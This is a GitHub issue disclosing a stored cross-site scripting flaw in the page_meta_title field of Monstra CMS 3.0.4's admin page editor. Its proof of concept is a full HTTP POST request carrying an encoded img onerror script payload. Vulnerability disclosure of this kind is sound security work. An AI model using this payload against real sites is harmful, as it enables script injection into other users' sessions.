Skip to content

Stored XSS in Monstra CMS 3.0.4 #458

New issue
New issue
Open
Open
Stored XSS in Monstra CMS 3.0.4#458
@PrincyEdward

Description

@PrincyEdward
PrincyEdward
opened on Sep 12, 2018

Monstra - Version 3.0.4

Exploit URI :
http://localhost/path/admin/index.php?id=pages&action=add_page
http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions